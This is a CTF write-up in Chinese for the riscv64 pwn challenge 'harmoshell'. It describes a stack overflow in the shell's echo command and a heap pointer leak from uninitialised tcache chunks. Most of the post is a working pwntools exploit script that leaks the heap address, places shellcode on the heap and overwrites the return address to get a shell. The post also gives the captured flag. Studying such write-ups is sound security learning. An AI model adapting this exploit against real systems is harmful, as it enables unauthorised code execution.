[Pwn] harmoshell - cpt.shao xp0int Posted on Apr 29 2021 riscv64的题目,用ghidra可以直接反编译,漏洞点在echo的函数里面:创建文件满了0x30个,再次echo会读入0x200个字节,但栈上空间只有0x100左右,造成栈溢出。分配chunk的时候也没有初始化操作,所以重新分配tcache的chunk的时候可以泄露heap上面的指针。 花了很多时间在搞系统态模拟的环境,最后搞了fedara的riscv环境,调试起来比较顺手,在系统态模拟环境下是有nx的,还浪费了很多时间想rop。结果试一下打远程,根本就是用户态启动,没有nx没有aslr。把shellcode写到堆上面溢出盖返回地址直接就能跳上去了。 ```python #flag{bm08elDkEvWnZjJZOwPEkr1Vfk} from pwn import * import re context.terminal = ['tmux', 'splitw', '-h'] context.arch = 'amd64' context.log_level = "debug" env = {'LD_PRELOAD': ''} if len(sys.argv) == 1: p = process('') elif len(sys.argv) == 3: p = remote(sys.argv[1], sys.argv[2]) se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) sea = lambda delim,data :p.sendafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr)) def touch(name): sla("$", "touch " + name) def echo(name, content): sla("$", "echo > %s" % (name)) time.sleep(0.1) se(content) time.sleep(0.1) def echo_append(name, content): sla("$", "echo >> %s" % (name)) se(content) def cat(name): sla("$", "cat %s" % name) def rm(name): sla("$", "rm %s" % name) for i in range(0x2): touch("a"*8) for i in range(2): rm("a"*8) # for i in range(2): # touch("b"*8) touch("b"*8) touch("c"*8) cat("b"*8) ru("Content: ") leak_heap = uu64(ru('\n')) info_addr("leak_heap", leak_heap) SC = open("sc.bin", "rb").read() echo("b"*8, "B"*0x100) echo("c"*8, SC.ljust(0x20)) # shellcode here for i in range(0x30-2): touch("a"*8) raw_input("here?") echo("d"*0x8, cyclic(312) + p64(leak_heap)) # gdb.attach(p, gdbcmd) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册